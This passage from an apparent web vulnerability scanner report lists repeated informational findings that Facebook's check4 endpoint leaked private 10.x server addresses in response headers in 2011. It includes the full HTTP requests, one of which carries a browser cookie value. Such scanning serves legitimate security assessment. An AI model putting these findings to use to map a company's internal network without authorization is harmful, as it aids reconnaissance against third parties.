Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.237.45
X-Cnection: close
Date: Thu, 16 Jun 2011 16:49:04 GMT

/*1308242944,171896109*/

window._ip_w["check4"] = 0;

19.9. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.206.43

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.206.43
X-Cnection: close
Date: Thu, 16 Jun 2011 16:28:22 GMT

/*1308241702,171363883*/

window._ip_w["check4"] = 0;

19.10. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.72.49

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.72.49
X-Cnection: close
Date: Thu, 16 Jun 2011 14:50:10 GMT

/*1308235810,171329585*/

window._ip_w["check4"] = 0;

19.11. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.109.41

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14e6879a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17b9d8228%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.109.41
X-Cnection: close
Date: Thu, 16 Jun 2011 15:46:59 GMT

/*1308239219,171339049*/

window._ip_w["check4"] = 0;

19.12. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.235.54

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d27b033%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffc3d649fc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.235.54
X-Cnection: close
Date: Thu, 16 Jun 2011 13:12:09 GMT

/*1308229929,171895606*/

window._ip_w["check4"] = 0;

19.13. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.196.35

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df5518899%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25942f924%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.196.35
X-Cnection: close
Date: Thu, 16 Jun 2011 16:54:13 GMT

/*1308243253,171361315*/

window._ip_w["check4"] = 0;

19.14. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.179.57

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34a75172c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbad24028%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.179.57
X-Cnection: close
Date: Thu, 16 Jun 2011 16:28:26 GMT

/*1308241706,171356985*/

window._ip_w["check4"] = 0;

19.15. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.54.25

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8c21b14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f3e598%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.54.25
X-Cnection: close
Date: Thu, 16 Jun 2011 17:40:47 GMT

/*1308246047,171324953*/

window._ip_w["check4"] = 0;

19.16. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.4.38

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.55.4.38
X-Cnection: close
Date: Thu, 16 Jun 2011 13:22:22 GMT

/*1308230542,171377702*/

window._ip_w["check4"] = 0;

19.17. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.182.35

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.182.35
X-Cnection: close
Date: Thu, 16 Jun 2011 16:54:12 GMT

/*1308243252,171357731*/

window._ip_w["check4"] = 0;

19.18. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.50.40

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31f2e355%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2517c53d%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.50.40
X-Cnection: close
Date: Thu, 16 Jun 2011 12:20:21 GMT

/*1308226821,171323944*/

window._ip_w["check4"] = 0;

19.19. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.51.42

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17499c92c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff96bb174%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.51.42
X-Cnection: close
Date: Thu, 16 Jun 2011 14:50:13 GMT

/*1308235813,171324202*/

window._ip_w["check4"] = 0;

19.20. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.134.64

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.134.64
X-Cnection: close
Date: Thu, 16 Jun 2011 16:07:40 GMT

/*1308240460,171345472*/

window._ip_w["check4"] = 0;

19.21. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.213.54

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df283f04cd%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa0ab181%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.213.54
X-Cnection: close
Date: Thu, 16 Jun 2011 18:06:47 GMT

/*1308247607,171889974*/

window._ip_w["check4"] = 0;

19.22. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.7.32

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df398326d08%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffef219d14%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.55.7.32
X-Cnection: close
Date: Thu, 16 Jun 2011 13:01:41 GMT

/*1308229301,171378464*/

window._ip_w["check4"] = 0;

19.23. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.116.33

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.116.33
X-Cnection: close
Date: Thu, 16 Jun 2011 12:15:08 GMT

/*1308226508,171340833*/

window._ip_w["check4"] = 0;

19.24. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.84.37

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a6f47958%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff321cafa4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.84.37
X-Cnection: close
Date: Thu, 16 Jun 2011 17:35:38 GMT

/*1308245738,171332645*/

window._ip_w["check4"] = 0;

19.25. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.150.47

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.150.47
X-Cnection: close
Date: Thu, 16 Jun 2011 16:23:11 GMT

/*1308241391,171873839*/

window._ip_w["check4"] = 0;

19.26. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.24.38

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.24.38
X-Cnection: close
Date: Thu, 16 Jun 2011 15:46:58 GMT

/*1308239218,171317286*/

window._ip_w["check4"] = 0;

19.27. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.223.106

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdd5cdee%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3575fe8e%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 55
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Powered-By: HPHP
X-FB-Server: 10.32.223.106
X-Cnection: close
Date: Thu, 16 Jun 2011 15:00:32 GMT

/*1308236432,169926506*/

window._ip_w["check4"] = 177;

19.28. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.252.121

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1850dd0e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff15c9a2904%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.252.121
X-Cnection: close
Date: Thu, 16 Jun 2011 12:30:54 GMT

/*1308227454,169933945*/

window._ip_w["check4"] = 0;

19.29. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.126.26

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.126.26
X-Cnection: close
Date: Thu, 16 Jun 2011 11:54:30 GMT

/*1308225270,171867674*/

window._ip_w["check4"] = 0;

19.30. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.124.35

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.124.35
X-Cnection: close
Date: Thu, 16 Jun 2011 18:27:24 GMT

/*1308248844,171867171*/

window._ip_w["check4"] = 0;

19.31. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.156.39

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.156.39
X-Cnection: close
Date: Thu, 16 Jun 2011 19:08:56 GMT

/*1308251336,171875367*/

window._ip_w["check4"] = 0;

